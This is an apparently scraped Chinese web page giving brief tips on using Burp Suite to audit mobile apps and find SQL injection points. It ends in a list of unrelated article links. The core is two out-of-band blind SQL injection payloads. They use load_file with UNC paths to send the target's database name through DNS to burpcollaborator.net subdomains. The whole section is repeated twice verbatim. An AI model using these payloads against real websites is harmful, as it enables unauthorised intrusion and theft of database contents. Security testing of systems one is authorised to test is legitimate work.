web渗透—工具burpsuit的使用
来源:互联网 发布:matlab 声明一个数组 编辑:程序博客网 时间:2024/05/17 08:54
1、更改代理地址后,可以利用此工具来审计手机上的APP,功能强大!
缺点:手机会卡
2、SQL注入时,,启用burpsuit代理,会监控网站访问的数据流量,从而可以找到注入点进行注入测试。
3、通过域名-IP,可以代外,方便盲注
代外一句话:
and select load_file(concat('\\\\',(select DATABASE()),'.mxnqgnvk47oqqfmd80dfq9gdq4wukj.burpcollaborator.net\\ryre'))##
其中,mxnqgnvk47oqqfmd80dfq9gdq4wukj.burpcollaborator.net为burp代理的二级域名,
ryre是任意文件夹目录
也可以加上if语句…
and if(select LOAD_FILE(CONCAT('\\\\',(select DATABASE()),'.bgv32oe3b2fov55nvyfg56l0sryhm6.burpcollaborator.net\\ryre')),1,1)##
缺点:手机会卡
2、SQL注入时,,启用burpsuit代理,会监控网站访问的数据流量,从而可以找到注入点进行注入测试。
3、通过域名-IP,可以代外,方便盲注
代外一句话:
and select load_file(concat('\\\\',(select DATABASE()),'.mxnqgnvk47oqqfmd80dfq9gdq4wukj.burpcollaborator.net\\ryre'))##
其中,mxnqgnvk47oqqfmd80dfq9gdq4wukj.burpcollaborator.net为burp代理的二级域名,
ryre是任意文件夹目录
也可以加上if语句…
and if(select LOAD_FILE(CONCAT('\\\\',(select DATABASE()),'.bgv32oe3b2fov55nvyfg56l0sryhm6.burpcollaborator.net\\ryre')),1,1)##
阅读全文
0 0
- web渗透—工具burpsuit的使用
- Firefox渗透插件—Web渗透必备工具
- Firefox渗透插件—Web渗透必备工具
- 关于渗透环境以及渗透工具的使用
- WEB渗透——新手入门之初级工具利用
- burpsuit乱码的解决方法
- burpsuit的使用方法
- Burpsuit使用——暴力破解(Intruder入侵)
- BurpSuit
- 渗透工具之nmap使用
- burpsuit安装及使用教程
- 使用burpsuit捕获手机流量
- windows系统-web渗透工具-AWVS
- 轻量级Web渗透测试工具jSQL
- Metasploit渗透工具的应用
- Metasploit渗透工具的应用
- burpsuit暴力破解的方法
- Burpsuit提示Handshake_failure的解决办法
- 用Netty开发中间件:高并发性能优化
- 讲给Android程序员看的前端教程(11)——CSS选择器(1)
- HTML5的一些表单类型
- JAVA实践-maven中如何导入jstl包
- python 创建读写目录,文件
- web渗透—工具burpsuit的使用
- Android 项目更换头像(拍照和选择相册)
- java lastIndexOf以及substring 方法笔记
- urlConnection的网络访问
- DotNet 资源大全中文版(Awesome最新版)
- VS2015+Qt程序运行与发布
- adb操作命令详解及大全
- 字典排序问题——在value的基础上对key排序
- 表格内容位置原则